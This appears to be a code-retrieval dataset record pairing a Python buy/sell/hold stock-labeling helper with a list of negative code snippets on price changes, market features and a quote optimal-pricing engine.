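# Hypothetical labeling helper (assumption, not from the source): maps the
# percentage-change columns produced by process_data_for_labels() to one class.
def buy_sell_hold(*cols, requirement=0.02):
    # buy (1) if any horizon gained more than 2%, sell (-1) if any lost more
    # than 2%, otherwise hold (0)
    for col in cols:
        if col > requirement:
            return 1
        if col < -requirement:
            return -1
    return 0

# Example usage (df and ticker are assumed to exist, as in the function above):
tickers, data_ = process_data_for_labels(df, ticker, 7)
data_['{}_target'.format(ticker)] = list(map(
    buy_sell_hold,
    *[data_['{}_{}d'.format(ticker, i)] for i in range(1, 8)]
))

Checking buy before sell means a week that both rises and falls past the threshold is labeled buy; that ordering is a design choice, not something stated in the query.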
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def percent_changes(self):\n\n # close_t = float(val[\"klines\"][\"1m\"].get(self.mw.cfg_manager.pair, {})[-5][4])\n klines_data = self.mw.klines.get(\"1m\")\n coin_data = klines_data.get(self.mw.cfg_manager.pair)\n\n if isinstance(coin_data, list):\n close_5m = float(self.mw.klines[\"1m\"][self.mw.cfg_manager.pair][-5][4])\n close_15m = float(self.mw.klines[\"1m\"][self.mw.cfg_manager.pair][-15][4])\n # close_30m = float(self.mw.klines[\"1m\"][self.mw.cfg_manager.pair][-30][4])\n close_1h = float(self.mw.klines[\"1m\"][self.mw.cfg_manager.pair][-60][4])\n close_4h = float(self.mw.klines[\"1m\"][self.mw.cfg_manager.pair][-240][4])\n\n change_5m_value = ((float(val[\"tickers\"][self.mw.cfg_manager.pair][\"lastPrice\"]) / float(close_5m)) - 1) * 100\n change_15m_value = ((float(val[\"tickers\"][self.mw.cfg_manager.pair][\"lastPrice\"]) / float(close_15m)) - 1) * 100\n # change_30m_value = ((float(val[\"tickers\"][self.mw.cfg_manager.pair][\"lastPrice\"]) / float(close_30m)) - 1) * 100\n change_1h_value = ((float(val[\"tickers\"][self.mw.cfg_manager.pair][\"lastPrice\"]) / float(close_1h)) - 1) * 100\n change_4h_value = ((float(val[\"tickers\"][self.mw.cfg_manager.pair][\"lastPrice\"]) / float(close_4h)) - 1) * 100\n\n change_1d_value = float(val[\"tickers\"][self.mw.cfg_manager.pair][\"priceChangePercent\"])\n\n\n changes = [self.mw.change_5m, self.mw.change_15m, self.mw.change_1h, self.mw.change_4h, self.mw.change_1d]\n change_values = [change_5m_value, change_15m_value, change_1h_value, change_4h_value, change_1d_value]\n\n for i, change in enumerate(changes):\n if change_values[i] > 0:\n operator = \"+\"\n color = Colors.color_green\n elif change_values[i] < 0:\n operator = \"\"\n color = Colors.color_pink\n else:\n operator = \"\"\n color = Colors.color_grey\n\n # print(str(change))\n change.setText(\"<span style='color: \" + color + \"'>\" + operator + \"{0:.2f}\".format(change_values[i]) + \"%</span\")", "def calculate_profit(self):", "def trend_price_up(self):\n raise NotImplementedError()", "def stock_price_summary(price_changes):\n\n gains = 0.0\n losses = 0.0\n\n for change in price_changes:\n if change > 0:\n gains += change\n elif change < 0:\n losses += change\n\n return (math.floor(gains*100)/100, math.ceil(losses*100)/100)", "def get_data_from_individual_company_pages(soup):\n individual_company_data = []\n usd_roe = get_usd_roe()\n company_code = (\n soup.find(\"meta\", {\"name\": \"description\"}).get(\"content\").split(\":\")[0]\n )\n current_price_usd = float(\n soup.find(\"span\", {\"class\": \"price-section__current-value\"}).text.replace(\n \",\", \"\"\n )\n )\n current_price = round(current_price_usd * usd_roe)\n try:\n p_e_ratio = float(\n soup.find(\n \"div\", {\"class\": \"snapshot__header\"}, string=\"P/E Ratio\"\n ).previous_sibling.replace(\",\", \"\")\n )\n except AttributeError:\n p_e_ratio = 0\n\n try:\n week_52_low = float(\n soup.find(\"div\", {\"class\": \"snapshot__header\"}, string=\"52 Week Low\")\n .previous_sibling.strip()\n .replace(\",\", \"\")\n )\n except AttributeError:\n week_52_low = 1\n\n try:\n week_52_high = float(\n soup.find(\"div\", {\"class\": \"snapshot__header\"}, string=\"52 Week High\")\n .previous_sibling.strip()\n .replace(\",\", \"\")\n )\n except AttributeError:\n week_52_high = 0\n\n unreal_profit_per_year_percent = round((week_52_high / week_52_low - 1) * 100, 2)\n\n individual_company_data.append(\n [company_code, current_price, p_e_ratio, unreal_profit_per_year_percent]\n )\n\n company_df = pd.DataFrame(\n 
columns=[\"company_code\", \"current_price\", \"P_E\", \"potential_profit_percent\"]\n )\n company_df = company_df.append(\n {\n \"company_code\": company_code,\n \"current_price\": current_price,\n \"P_E\": p_e_ratio,\n \"potential_profit_percent\": unreal_profit_per_year_percent,\n },\n ignore_index=True,\n )\n\n return company_df", "def train_predictors(market_data, functions_for_typical_price_data, functions_for_hlc_price_data, labels_for_typical_price_data, labels_for_hlc_price_data):\r\n standard = {}\r\n # high = market_data.loc[:, 'high'].values.tolist()\r\n # low = market_data.loc[:, 'low'].values.tolist()\r\n # close = market_data.loc[:, 'close'].values.tolist()\r\n volume = market_data.loc[:, 'volume'].values\r\n # typical_prices = typical_price(high, low, close)\r\n typical_prices = market_data.loc[:, 'weightedAverage'].values\r\n standard['volume'] = (np.nanmean(volume), np.nanstd(volume))\r\n standard['typical_price'] = (np.nanmean(typical_prices), np.nanstd(typical_prices))\r\n x = ((volume - standard['volume'][0])/standard['volume'][1])\r\n x = np.c_[(typical_prices - standard['typical_price'][0])/standard['typical_price'][1], x]\r\n typical_prices = typical_prices.tolist()\r\n for f, label in zip(functions_for_typical_price_data, labels_for_typical_price_data):\r\n values = np.array(f(typical_prices))\r\n standard[label] = (np.nanmean(values), np.nanstd(values))\r\n x = np.c_[x, (values - standard[label][0])/standard[label][1]]\r\n # for f, label in zip(functions_for_hlc_price_data, labels_for_hlc_price_data):\r\n # values = np.array(f(high, low, close))\r\n # if 'typical_price' in label and label != 'typical_price':\r\n # standard[label] = standard['typical_price']\r\n # else:\r\n # standard[label] = (np.nanmean(values), np.nanstd(values))\r\n # x = np.c_[x, (values - standard[label][0])/standard[label][1]]\r\n return pd.DataFrame(data=x, columns=['typical_price', 'volume']+labels_for_typical_price_data, index=market_data.index), standard", "def test_predictors(market_data, functions_for_typical_price_data, functions_for_hlc_price_data, labels_for_typical_price_data, labels_for_hlc_price_data, scaling_dict):\r\n x = []\r\n # high = market_data.loc[:, 'high'].values.tolist()\r\n # low = market_data.loc[:, 'low'].values.tolist()\r\n # close = market_data.loc[:, 'close'].values.tolist()\r\n volume = market_data.loc[:, 'volume'].values\r\n # typical_prices = typical_price(high, low, close)\r\n typical_prices = market_data.loc[:, 'weightedAverage'].values\r\n x.append(((typical_prices - scaling_dict['typical_price'][0])/scaling_dict['typical_price'][1]).tolist())\r\n typical_prices = typical_prices.tolist()\r\n x.append(((volume - scaling_dict['volume'][0])/scaling_dict['volume'][1]).tolist())\r\n for f, label in zip(functions_for_typical_price_data, labels_for_typical_price_data):\r\n values = np.array(f(typical_prices))\r\n x.append(((values - scaling_dict[label][0])/scaling_dict[label][1]).tolist())\r\n # for f, label in zip(functions_for_hlc_price_data, labels_for_hlc_price_data):\r\n # values = np.array(f(high, low, close))\r\n # x.append(((values - scaling_dict[label][0])/scaling_dict[label][1]).tolist())\r\n return pd.DataFrame(data=np.array(x).T, columns=['typical_price', 'volume']+labels_for_typical_price_data, index=market_data.index)", "def percentageChange(self):\n try:\n curPrice = self.dailyData[-1].currentPrice\n closePrice = self.historicData[-1].closePrice\n except IndexError: # Just return zero when no historic or dailyData is available yet\n return 0.0\n 
return (curPrice - closePrice)/closePrice * 100", "def compute_market_prices(prices):\n denom = prices.bid_volume + prices.ask_volume\n numer = (prices.bid_price * prices.ask_volume +\n prices.ask_price * prices.bid_volume)\n mask = denom == 0\n denom[mask] = 2\n numer[mask] = prices.bid_price[mask] + prices.ask_price[mask]\n prices = prices.copy()\n prices['market_price'] = numer / denom\n return prices", "def optimal_pricing_engine(model_ID, quote_df, COP_l=0, COP_m=0, COP_h=0):\r\n '''\r\n The purpose of this function is to process a quote using the optimal\r\n pricing model (as stored in the segmentation tree) to determine the \r\n optimal price and win probability data.\r\n \r\n Created: 05 May 2016 by Glenn Melzer\r\n Updated: 01 Aug 2016 by Glenn Melzer\r\n \r\n INPUTS:\r\n model_ID = the name of the model to be used for creating the optimal price \r\n quote_df = the dataframe of quote components (with the same column \r\n format as the historical data input dataframe).\r\n COP_l = Low bottom line customized optimal price\r\n COP_m = Median bottom line customized optimal price\r\n COP_h = High bottom line customized optimal price\r\n \r\n KEY INTERNAL OBJECTS NEEDED FOR THE ENGINE: \r\n seg_df = the quote segmentation tree built previously.\r\n ref_prc_col = the column that contains the reference price (typically list price)\r\n first = the name of the first column in quote_df that contains a segment \r\n classification identifier to be used.\r\n last = the name of the last column in quote_df that contains a classification \r\n identifier to be used. All columns from the first through the last\r\n will be used.\r\n prc_col = the column index name in quote_df that contains the historical\r\n quote price (as a % of reference price) as modified by the segmentation\r\n process.\r\n x_col = the name of the independant variable that affects pricing used in\r\n the regression to calculate the m and b parameters of the linear models. \r\n quote_attribute_cols = the list of column index names of quote_df that \r\n contain the historical data quote attributes.\r\n y_intercept = True or False. Indicate if the regression should have a\r\n y intercept. 
The default is False.\r\n \r\n OUTPUTS:\r\n quote_df = the original quote_df updated with columns for optimal price,\r\n win probability, etc.\r\n total_deal_stats = the statistics of the total deal\r\n \r\n ACCEPTANCE CRITERIA:\r\n The quote_df contains the required output column populated with data.\r\n '''\r\n start_time = time.time() #start a timer\r\n \r\n #this loads the correct model into seg_df based on the model_ID\r\n etext = 'seg_df = ' + rules_df.loc[model_ID,'seg_model_file_name'] + '_df.copy()'\r\n exec(etext)\r\n #this looks up the needed variables given the model_ID\r\n quote_id_col = rules_df.loc[model_ID,'quote_id_col']\r\n ref_prc_col = rules_df.loc[model_ID,'ref_prc_col']\r\n cost_col = rules_df.loc[model_ID,'cost_col']\r\n quote_prc_col = rules_df.loc[model_ID,'quote_prc_col']\r\n prc_col = rules_df.loc[model_ID,'prc_col']\r\n x_col = rules_df.loc[model_ID,'x_col']\r\n first = rules_df.loc[model_ID,'first']\r\n last = rules_df.loc[model_ID,'last']\r\n psych_factor = rules_df.loc[model_ID,'psych_factor']\r\n quote_attribute_cols = eval(rules_df.loc[model_ID,'quote_attribute_cols'])\r\n y_intercept = rules_df.loc[model_ID,'y_intercept']\r\n \r\n #The following defines objects needed to manage the segmentation tree building process\r\n cols = quote_df.columns\r\n for i in np.arange(len(cols)): #this for loop assigns column names to a list (cols)\r\n if (cols[i] == first):\r\n first_coln = i\r\n if (cols[i] == last):\r\n last_coln = i\r\n if (cols[i] == prc_col):\r\n prc_coln = i \r\n print ' Segmentation starts with Column (first_coln)(first): % r' % first_coln, first\r\n print ' Segmentation ends with Column (last_coln)(last): % r' % last_coln, last\r\n column_nums = range(first_coln, last_coln + 1) #this creates a list of the numbers of the columns used for component segmentation\r\n column_names = list(quote_df.columns[column_nums])\r\n print ' Column numbers of the index columns (column_nums): ',column_nums\r\n print ' Column names of the index column (column_names): ',column_names\r\n print ' Price Column (prc_coln)(prc_col): % r' % prc_coln, prc_col\r\n print ' quote_attribute_cols: % r' % quote_attribute_cols\r\n \r\n \r\n #this section ensures that needed columns are added to quote_df to match format of input_dataframe_expanded_05.csv\r\n quote_df.loc[:,'ComLowPofL'] = ''\r\n quote_df.loc[:,'ComMedPofL'] = ''\r\n quote_df.loc[:,'ComHighPofL'] = ''\r\n quote_df.loc[:,'ComMedPrice'] = ''\r\n quote_df.loc[:,'DealSize'] = ''\r\n quote_df.loc[:,'LogDealSize'] = ''\r\n quote_df.loc[:,'ComPctContrib'] = ''\r\n quote_df.loc[:,'TreeNode'] = ''\r\n #this section adds more columns to support optimal price calculations\r\n quote_df.loc[:,'ComTMCPofL'] = ''\r\n quote_df.loc[:,'AdjComLowPofL'] = ''\r\n quote_df.loc[:,'AdjComMedPofL'] = ''\r\n quote_df.loc[:,'AdjComHighPofL'] = ''\r\n quote_df.loc[:,'AdjComLowPrice'] = ''\r\n quote_df.loc[:,'AdjComMedPrice'] = ''\r\n quote_df.loc[:,'AdjComHighPrice'] = ''\r\n #this section creates columns for the optimal price data\r\n quote_df.loc[:,'OptimalPricePofL'] = ''\r\n quote_df.loc[:,'OptimalPrice'] = ''\r\n quote_df.loc[:,'OptimalPriceWinProb'] = ''\r\n quote_df.loc[:,'OptimalPriceGP'] = ''\r\n quote_df.loc[:,'OptimalPriceExpectedGP'] = ''\r\n quote_df.loc[:,'OptimalPriceIntervalLow'] = ''\r\n quote_df.loc[:,'OptimalPriceIntervalHigh'] = ''\r\n #this section creates columns for the quoted price data\r\n quote_df.loc[:,'QuotePricePofL'] = ''\r\n quote_df.loc[:,'QuotePrice'] = ''\r\n quote_df.loc[:,'QuotePriceWinProb'] = ''\r\n 
quote_df.loc[:,'QuotePriceGP'] = ''\r\n quote_df.loc[:,'QuotePriceExpectedGP'] = ''\r\n #this section creates columns for statistics\r\n quote_df.loc[:,'PredictedQuotePricePofL'] = ''\r\n quote_df.loc[:,'PredictedQuotePrice'] = ''\r\n #this section is for COP (Customized Optimal Price)\r\n # - L, M, H price points\r\n quote_df.loc[:,'COPComLowPrice'] = ''\r\n quote_df.loc[:,'COPComMedPrice'] = ''\r\n quote_df.loc[:,'COPComHighPrice'] = ''\r\n # - L, M, H price points as a % of List\r\n quote_df.loc[:,'COPComLowPofL'] = ''\r\n quote_df.loc[:,'COPComMedPofL'] = ''\r\n quote_df.loc[:,'COPComHighPofL'] = ''\r\n # - optimal prices and win probabilities\r\n quote_df.loc[:,'COPOptimalPrice'] = ''\r\n quote_df.loc[:,'COPOptimalPricePofL'] = ''\r\n quote_df.loc[:,'COPOptimalPriceWinProb'] = ''\r\n quote_df.loc[:,'COPOptimalPriceGP'] = ''\r\n quote_df.loc[:,'COPOptimalPriceExpectedGP'] = ''\r\n quote_df.loc[:,'COPOptimalPriceIntervalLow'] = ''\r\n quote_df.loc[:,'COPOptimalPriceIntervalHigh'] = ''\r\n # - quoted price data within customized optimal price (COP)\r\n quote_df.loc[:,'COPQuotePriceWinProb'] = ''\r\n quote_df.loc[:,'COPQuotePriceGP'] = ''\r\n quote_df.loc[:,'COPQuotePriceExpectedGP'] = ''\r\n \r\n #this section determines all of the column data needed for optimal price calculation\r\n #this determines the segment tree node to be used for each component of the quote\r\n column_headings = list(cols[column_nums])\r\n #seg_df.set_index(column_headings, inplace = True)\r\n for i in range(len(quote_df)): #this goes through each component in the quote_df\r\n column_values = list(quote_df.loc[i,column_headings])\r\n #print column_values\r\n works = False\r\n j = -1\r\n while works == False: #this finds the most specific valid node in the component segment tree\r\n try:\r\n Low_m = float(seg_df.loc[tuple(column_values), 'Low_m'])\r\n Low_b = float(seg_df.loc[tuple(column_values), 'Low_b'])\r\n Med_m = float(seg_df.loc[tuple(column_values), 'Med_m'])\r\n Med_b = float(seg_df.loc[tuple(column_values), 'Med_b'])\r\n High_m = float(seg_df.loc[tuple(column_values), 'High_m'])\r\n High_b = float(seg_df.loc[tuple(column_values), 'High_b'])\r\n Tree_Node = [seg_df.index.get_loc(tuple(column_values))][0]\r\n works = True\r\n except KeyError:\r\n column_values[j] = ''\r\n j -= 1\r\n \r\n #this calculates the low, med, and high (%ofList) price points\r\n x = quote_df.loc[i,x_col]\r\n low = Low_m * x + Low_b\r\n med = Med_m * x + Med_b\r\n high = High_m * x + High_b \r\n low,med,high = BPF.PriceAdj(low, med, high) #this makes any needed adjustments to the low, med, and high price points to eliminate anomolies\r\n #this writes the low, med, and high to the quote_df\r\n quote_df.loc[i,'ComLowPofL'] = low\r\n quote_df.loc[i,'ComMedPofL'] = med\r\n quote_df.loc[i,'ComHighPofL'] = high\r\n quote_df.loc[i,'TreeNode'] = Tree_Node\r\n #print 'Component Row, Tree_Node, & ComMedPofL: ', i, Tree_Node, med\r\n \r\n #this calculates and sets the ComMedPrice\r\n quote_df.loc[:,'ComMedPrice'] = (quote_df[ref_prc_col] * quote_df['ComMedPofL'])#.round(decimals = 2)\r\n #this calculates and sets the DealSize\r\n quote_df.loc[:,'DealSize'] = quote_df['ComMedPrice'].sum().round(decimals = 2)\r\n #this calculates and sets the Log of the DealSize\r\n quote_df.loc[:,'LogDealSize'] = np.log10(quote_df['DealSize'].astype(float))\r\n #this calculates the component's percent price contribution to the quote (based on component median price)\r\n quote_df.loc[:,'ComPctContrib'] = quote_df['ComMedPrice'] / quote_df['DealSize']\r\n \r\n 
#this section calculates the adjusted L, M, H values\r\n seg_df.reset_index(inplace = True)\r\n for i in range(len(quote_df)): #this goes through each component in the quote_df\r\n #set adjusted values for low and high to match original values for low and high\r\n adjlow = quote_df.loc[i,'ComLowPofL']\r\n adjhigh = quote_df.loc[i,'ComHighPofL']\r\n #adjust median point in price sensitivity curve for quote level attributes\r\n adjmed = 0\r\n for j in range(len(quote_attribute_cols)): #this calculates the value of the multiple linear regression\r\n adjmed += quote_df.loc[i, quote_attribute_cols[j]] * seg_df.loc[quote_df.loc[i, 'TreeNode'], 'QP_' + quote_attribute_cols[j]]\r\n #print 'Factors: ',i,j,quote_df.loc[i, quote_attribute_cols[j]], seg_df.loc[quote_df.loc[i, 'TreeNode'], 'QP_' + quote_attribute_cols[j]]\r\n if y_intercept == True:\r\n adjmed += seg_df.loc[quote_df.loc[i, 'TreeNode'], 'QP_intercept']\r\n #adjust median point in price sensitivity curve for skew in data\r\n quote_df.loc[i, 'PredictedQuotePricePofL'] = adjmed\r\n quote_df.loc[i, 'PredictedQuotePrice'] = adjmed * quote_df.loc[i, 'ComListPrice']\r\n adjmed += seg_df.loc[quote_df.loc[i, 'TreeNode'], 'Adj_YtoMedPofL']\r\n #adjust all points in price sensitivity curve for bias from using win data only\r\n adj = seg_df.loc[quote_df.loc[i, 'TreeNode'], 'Adj_psych']\r\n adjlow *= adj\r\n adjmed *= adj\r\n adjhigh *= adj\r\n #adjust all points in price sensitivity curve for brand input\r\n adj = seg_df.loc[quote_df.loc[i, 'TreeNode'], 'Adj_InputByBrand']\r\n adjlow += adj\r\n adjmed += adj\r\n adjhigh += adj\r\n adjlow,adjmed,adjhigh = BPF.PriceAdj(adjlow, adjmed, adjhigh) #this makes any needed adjustments to the low, med, and high price points to eliminate anomolies\r\n #store adjusted values\r\n quote_df.loc[i, 'AdjComLowPofL'] = adjlow\r\n quote_df.loc[i, 'AdjComMedPofL'] = adjmed\r\n quote_df.loc[i, 'AdjComHighPofL'] = adjhigh\r\n ListPrice = quote_df.loc[i, 'ComListPrice']\r\n quote_df.loc[i, 'AdjComLowPrice'] = adjlow * ListPrice\r\n quote_df.loc[i, 'AdjComMedPrice'] = adjmed * ListPrice\r\n quote_df.loc[i, 'AdjComHighPrice'] = adjhigh * ListPrice\r\n \r\n #this section calculates the optimal price data\r\n for i in range(len(quote_df)): #this goes through each component in the quote_df\r\n L = quote_df.loc[i,'AdjComLowPofL']\r\n M = quote_df.loc[i,'AdjComMedPofL']\r\n H = quote_df.loc[i,'AdjComHighPofL']\r\n Cf = 1.0 * quote_df.loc[i,'ComTMC'] / quote_df.loc[i,'ComListPrice']\r\n quote_df.loc[i, 'ComTMCPofL'] = Cf\r\n quote_df.loc[i, 'OptimalPricePofL'] = BPF.OptPrice(L, M, H, Cf, 0, 0, 0)\r\n quote_df.loc[i, 'OptimalPrice'] = quote_df.loc[i, 'OptimalPricePofL'] * quote_df.loc[i, 'ComListPrice']\r\n quote_df.loc[i, 'OptimalPriceWinProb'] = BPF.ProbOfWin(quote_df.loc[i, 'OptimalPricePofL'], L, M, H)\r\n quote_df.loc[i, 'OptimalPriceGP'] = quote_df.loc[i, 'OptimalPrice'] - quote_df.loc[i,'ComTMC']\r\n quote_df.loc[i, 'OptimalPriceExpectedGP'] = quote_df.loc[i, 'OptimalPriceGP'] * quote_df.loc[i, 'OptimalPriceWinProb']\r\n quote_df.loc[i, 'OptimalPriceIntervalLow'], quote_df.loc[i, 'OptimalPriceIntervalHigh'] = BPF.OptPriceConfIntervl(quote_df.loc[i, 'OptimalPrice'], quote_df.loc[i,'AdjComLowPrice'], quote_df.loc[i,'AdjComMedPrice'], quote_df.loc[i,'AdjComHighPrice'], quote_df.loc[i, 'ComTMC'])\r\n #this section shows quoted (i.e. 
requested) price data\r\n quote_df.loc[i, 'QuotePricePofL'] = quote_df.loc[i, 'ComQuotePricePofL']\r\n quote_df.loc[i, 'QuotePrice'] = quote_df.loc[i, 'ComQuotePrice']\r\n quote_df.loc[i, 'QuotePriceWinProb'] = BPF.ProbOfWin(quote_df.loc[i, 'QuotePricePofL'], L, M, H)\r\n quote_df.loc[i, 'QuotePriceGP'] = quote_df.loc[i, 'QuotePrice'] - quote_df.loc[i,'ComTMC']\r\n quote_df.loc[i, 'QuotePriceExpectedGP'] = quote_df.loc[i, 'QuotePriceGP'] * quote_df.loc[i, 'QuotePriceWinProb']\r\n \r\n #this section calculates the Customized Optimal Price (COP) data\r\n if (COP_h > COP_m) and (COP_m > COP_l):\r\n Lt = quote_df['AdjComLowPrice'].sum()\r\n Mt = quote_df['AdjComMedPrice'].sum()\r\n Ht = quote_df['AdjComHighPrice'].sum()\r\n LISTt = quote_df['ComListPrice'].sum()\r\n for i in range(len(quote_df)): #this goes through each component in the quote_df\r\n Li = quote_df.loc[i, 'AdjComLowPrice'].round(decimals=2)\r\n Mi = quote_df.loc[i, 'AdjComMedPrice'].round(decimals=2)\r\n Hi = quote_df.loc[i, 'AdjComHighPrice'].round(decimals=2)\r\n LISTi = quote_df.loc[i, 'ComListPrice'].round(decimals=2)\r\n #this section uses linear interpolation for setting COP component prices from the bottom line price\r\n quote_df.loc[i, 'COPComLowPrice'] = BPF.PriceConv(Lt, Mt, Ht, LISTt, COP_l, Li, Mi, Hi, LISTi).round(decimals=2)\r\n quote_df.loc[i, 'COPComMedPrice'] = BPF.PriceConv(Lt, Mt, Ht, LISTt, COP_m, Li, Mi, Hi, LISTi).round(decimals=2)\r\n quote_df.loc[i, 'COPComHighPrice'] = BPF.PriceConv(Lt, Mt, Ht, LISTt, COP_h, Li, Mi, Hi, LISTi).round(decimals=2)\r\n #this section calculate the COP PofL prices\r\n quote_df.loc[i, 'COPComLowPofL'] = quote_df.loc[i, 'COPComLowPrice'] / LISTi\r\n quote_df.loc[i, 'COPComMedPofL'] = quote_df.loc[i, 'COPComMedPrice'] / LISTi\r\n quote_df.loc[i, 'COPComHighPofL'] = quote_df.loc[i, 'COPComHighPrice'] / LISTi\r\n #this section calculate the COP optimal prices, win probabilities, and profitability\r\n quote_df.loc[i, 'COPOptimalPrice'] = BPF.OptPrice(quote_df.loc[i, 'COPComLowPrice'], quote_df.loc[i, 'COPComMedPrice'], quote_df.loc[i, 'COPComHighPrice'], quote_df.loc[i, 'ComTMC'], 0, 0, 0).round(decimals=2)\r\n quote_df.loc[i, 'COPOptimalPricePofL'] = quote_df.loc[i, 'COPOptimalPrice'] / LISTi\r\n quote_df.loc[i, 'COPOptimalPriceWinProb'] = BPF.ProbOfWin(quote_df.loc[i, 'COPOptimalPrice'], quote_df.loc[i, 'COPComLowPrice'], quote_df.loc[i, 'COPComMedPrice'], quote_df.loc[i, 'COPComHighPrice'])\r\n quote_df.loc[i, 'COPOptimalPriceGP'] = quote_df.loc[i, 'COPOptimalPrice'] - quote_df.loc[i, 'ComTMC']\r\n quote_df.loc[i, 'COPOptimalPriceExpectedGP'] = (quote_df.loc[i, 'COPOptimalPriceGP'] * quote_df.loc[i, 'COPOptimalPriceWinProb']).round(decimals=2)\r\n quote_df.loc[i, 'COPOptimalPriceIntervalLow'], quote_df.loc[i, 'COPOptimalPriceIntervalHigh'] = BPF.OptPriceConfIntervl(quote_df.loc[i, 'COPOptimalPrice'], quote_df.loc[i,'COPComLowPrice'], quote_df.loc[i,'COPComMedPrice'], quote_df.loc[i,'COPComHighPrice'], quote_df.loc[i, 'ComTMC'])\r\n #this section calculates the quoted price statistics given the COP prices\r\n quote_df.loc[i, 'COPQuotePriceWinProb'] = BPF.ProbOfWin(quote_df.loc[i, 'QuotePrice'], quote_df.loc[i, 'COPComLowPrice'], quote_df.loc[i, 'COPComMedPrice'], quote_df.loc[i, 'COPComHighPrice'])\r\n quote_df.loc[i, 'COPQuotePriceGP'] = quote_df.loc[i, 'QuotePriceGP']\r\n quote_df.loc[i, 'COPQuotePriceExpectedGP'] = quote_df.loc[i, 'COPQuotePriceGP'] * quote_df.loc[i, 'COPQuotePriceWinProb']\r\n print; print ' quote_df update complete'\r\n \r\n \r\n #this section calculates the 
total deal values\r\n # this section contains general quote totals\r\n total_deal_stats = pd.Series('', index=[' General Total Quote Data'])\r\n total_deal_stats['DealListPrice'] = quote_df['ComListPrice'].sum()\r\n total_deal_stats['DealSize'] = quote_df['ComMedPrice'].sum().round(decimals=2)\r\n total_deal_stats['DealTMC'] = quote_df['ComTMC'].sum()\r\n total_deal_stats['DealPredictedQuotePrice'] = quote_df['PredictedQuotePrice'].sum().round(decimals=0)\r\n # this section contains Price Range Data (Line Item Sum)\r\n total_deal_stats[' Price Range Data (Line Item Sum)'] = ''\r\n total_deal_stats['DealAdjLowPrice'] = quote_df['AdjComLowPrice'].sum().round(decimals=0)\r\n total_deal_stats['DealAdjMedPrice'] = quote_df['AdjComMedPrice'].sum().round(decimals=0)\r\n total_deal_stats['DealAdjHighPrice'] = quote_df['AdjComHighPrice'].sum().round(decimals=0)\r\n # this section contains Quoted Price Data (Line Item Sum)\r\n total_deal_stats[' Quoted Price Data (Line Item Sum)'] = ''\r\n total_deal_stats['DealQuotePrice'] = quote_df['ComQuotePrice'].sum()\r\n total_deal_stats['DealQuotePriceWinProb'] = ''\r\n total_deal_stats['DealQuotePriceGP'] = total_deal_stats['DealQuotePrice'] - total_deal_stats['DealTMC']\r\n total_deal_stats['DealQuotePriceExpectedGP'] = quote_df['QuotePriceExpectedGP'].sum()\r\n total_deal_stats['DealQuotePriceWinProb'] = total_deal_stats['DealQuotePriceExpectedGP'] / total_deal_stats['DealQuotePriceGP']\r\n # this section contains optimal price data\r\n total_deal_stats[' Optimal Price Data (Line Item Sum)'] = ''\r\n total_deal_stats['DealOptimalPrice'] = quote_df['OptimalPrice'].sum().round(decimals=0)\r\n total_deal_stats['DealOptimalPriceWinProb'] = ''\r\n total_deal_stats['DealOptimalPriceGP'] = quote_df['OptimalPriceGP'].sum().round(decimals=2)\r\n total_deal_stats['DealOptimalPriceExpectedGP'] = quote_df['OptimalPriceExpectedGP'].sum().round(decimals=2)\r\n total_deal_stats['DealOptimalPriceWinProb'] = total_deal_stats['DealOptimalPriceExpectedGP'] / total_deal_stats['DealOptimalPriceGP']\r\n total_deal_stats['DealOptimalPriceIntervalLow'] = quote_df['OptimalPriceIntervalLow'].sum().round(decimals=0)\r\n total_deal_stats['DealOptimalPriceIntervalHigh'] = quote_df['OptimalPriceIntervalHigh'].sum().round(decimals=0)\r\n # this section contains Quoted Price Data (Bottom-Line)\r\n total_deal_stats[' Quoted Price Data (Bottom-Line)'] = ''\r\n total_deal_stats['DealBotLineQuotePrice'] = total_deal_stats['DealQuotePrice']\r\n total_deal_stats['DealBotLineQuotePriceWinProb'] = BPF.ProbOfWin(total_deal_stats['DealBotLineQuotePrice'], total_deal_stats['DealAdjLowPrice'], total_deal_stats['DealAdjMedPrice'], total_deal_stats['DealAdjHighPrice'])\r\n total_deal_stats['DealBotLineQuotePriceGP'] = total_deal_stats['DealBotLineQuotePrice'] - total_deal_stats['DealTMC']\r\n total_deal_stats['DealBotLineQuotePriceExpectedGP'] = total_deal_stats['DealBotLineQuotePriceGP'] * total_deal_stats['DealBotLineQuotePriceWinProb']\r\n # this section contains Optimal Price Data (Bottom-Line)\r\n total_deal_stats[' Optimal Price Data (Bottom-Line)'] = ''\r\n total_deal_stats['DealBotLineOptimalPrice'] = BPF.OptPrice(total_deal_stats['DealAdjLowPrice'], total_deal_stats['DealAdjMedPrice'], total_deal_stats['DealAdjHighPrice'], total_deal_stats['DealTMC'], 0, 0, 0)\r\n total_deal_stats['DealBotLineOptimalPriceWinProb'] = BPF.ProbOfWin(total_deal_stats['DealBotLineOptimalPrice'], total_deal_stats['DealAdjLowPrice'], total_deal_stats['DealAdjMedPrice'], total_deal_stats['DealAdjHighPrice'])\r\n 
total_deal_stats['DealBotLineOptimalPriceGP'] = total_deal_stats['DealBotLineOptimalPrice'] - total_deal_stats['DealTMC']\r\n total_deal_stats['DealBotLineOptimalPriceExpectedGP'] = total_deal_stats['DealBotLineOptimalPriceGP'] * total_deal_stats['DealBotLineOptimalPriceWinProb']\r\n total_deal_stats['DealBotLineOptimalPriceIntervalLow'], total_deal_stats['DealBotLineOptimalPriceIntervalHigh'] = BPF.OptPriceConfIntervl(total_deal_stats['DealBotLineOptimalPrice'], total_deal_stats['DealAdjLowPrice'], total_deal_stats['DealAdjMedPrice'], total_deal_stats['DealAdjHighPrice'], total_deal_stats['DealTMC'])\r\n \r\n #this section is executed only if customized optimal pricing (COP) is needed\r\n if (COP_h > COP_m) and (COP_m > COP_l):\r\n # this section contains COP Price Range Data (Line Item Sum)\r\n total_deal_stats[' COP Price Range Data (Line Item Sum)'] = ''\r\n total_deal_stats['DealCOPLowPrice'] = quote_df['COPComLowPrice'].sum().round(decimals=0)\r\n total_deal_stats['DealCOPMedPrice'] = quote_df['COPComMedPrice'].sum().round(decimals=0)\r\n total_deal_stats['DealCOPHighPrice'] = quote_df['COPComHighPrice'].sum().round(decimals=0)\r\n # this section contains COP Quote Price Data (Line Item Sum)\r\n total_deal_stats[' COP Quote Price Data (Line Item Sum)'] = ''\r\n total_deal_stats['DealCOPQuotePrice'] = quote_df['ComQuotePrice'].sum()\r\n total_deal_stats['DealCOPQuotePriceWinProb'] = ''\r\n total_deal_stats['DealCOPQuotePriceGP'] = quote_df['COPQuotePriceGP'].sum().round(decimals=0)\r\n 